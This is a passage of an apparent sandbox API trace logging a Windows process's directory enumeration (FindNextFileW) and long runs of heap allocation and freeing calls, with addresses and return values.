ftLastWriteTime.dwLowDateTime=0x30c589f0, ftLastWriteTime.dwHighDateTime=0x1d5ba2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yo5RRMrTBRvZPTzk", cAlternateFileName="YO5RRM~1")) returned 1 [0095.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0095.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3e20 [0095.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161c80 | out: hHeap=0x680000) returned 1 [0095.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.804] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf366e0d0, ftCreationTime.dwHighDateTime=0x1d5bb93, ftLastAccessTime.dwLowDateTime=0x654aa400, ftLastAccessTime.dwHighDateTime=0x1d5b65a, ftLastWriteTime.dwLowDateTime=0x654aa400, ftLastWriteTime.dwHighDateTime=0x1d5b65a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_tGjm1G", cAlternateFileName="")) returned 1 [0095.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd20 [0095.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0095.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd20 | out: hHeap=0x680000) returned 1 [0095.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.804] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf366e0d0, ftCreationTime.dwHighDateTime=0x1d5bb93, ftLastAccessTime.dwLowDateTime=0x654aa400, ftLastAccessTime.dwHighDateTime=0x1d5b65a, ftLastWriteTime.dwLowDateTime=0x654aa400, ftLastWriteTime.dwHighDateTime=0x1d5b65a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_tGjm1G", cAlternateFileName="")) returned 0 [0095.804] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0095.805] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb408 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d7d8 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb9e0 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cba38 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb618 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316de58 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dc50 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dbe8 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cbae8 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d840 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb880 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316db80 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb828 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb7d0 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316db18 | out: hHeap=0x680000) returned 1 [0095.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb778 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb4b8 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cbb98 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31beb38 | out: hHeap=0x680000) returned 1 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0095.806] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0095.807] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0095.807] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.812] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | 